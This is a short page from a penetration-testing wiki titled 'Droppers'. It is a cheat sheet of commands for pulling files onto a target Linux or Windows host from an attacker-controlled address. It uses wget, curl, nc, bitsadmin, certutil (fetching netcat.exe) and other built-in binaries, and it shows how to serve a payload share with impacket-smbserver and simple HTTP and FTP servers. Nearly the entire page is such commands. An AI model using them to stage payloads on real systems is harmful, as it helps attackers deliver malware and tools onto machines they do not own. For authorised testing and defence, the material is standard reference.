Droppers
From pentestwiki.org
Classic methods
Linux
$
wget http://$IP/file
$
curl -k https://$IP/file > file
$
nc -nvv $IP 8080 > file
$
scp $FILE [email protected]$IP:~
Windows
Powershell
PS>
curl -Uri $URL
See also Powercat
VBscript
ROBOCOPY
C:>
NET USE \\$IP\IPC$ /USER:DOMAIN\USER
C:>
ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
C:>
NET USE \\$IP\IPC$ /D
BITSAdmin
https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool
- Direct Transfer:
C:>
bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE
- Using a download queue:
C:>
bitsadmin /create myDownloadJob
C:>
bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE
Certutil
C:>
certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe
Notepad
C:>
notepad.exe http://$IP/file.txt
Living Off the Land (LOLbins) for Windows
Links:
- https://github.com/LOLBAS-Project/LOLBAS
- https://lolbas-project.github.io/
- https://gtfobins.github.io/
- https://github.com/Arno0x/CSharpScripts
- https://gist.github.com/jstangroome/9adaa87a845e5be906c8
- https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1
Examples:
C:>
hh.exe C:\windows\system32\calc.exe
C# compiler built-in command:
C:>
csc.exe
Using known protocols
HTTP
- Python2
$
python -m SimpleHTTPServer
root #
python -m SimpleHTTPServer 80
- Python3
$
python3 -m http.server 8080
- Php
$
php -S localhost:8000
- Ruby
$
ruby -run -e httpd . -p 8000
FTP
root #
pip install pyftpdlib
root #
python -m pyftpdlib
SMB
root #
impacket-smbserver PAYLOADS /root/payload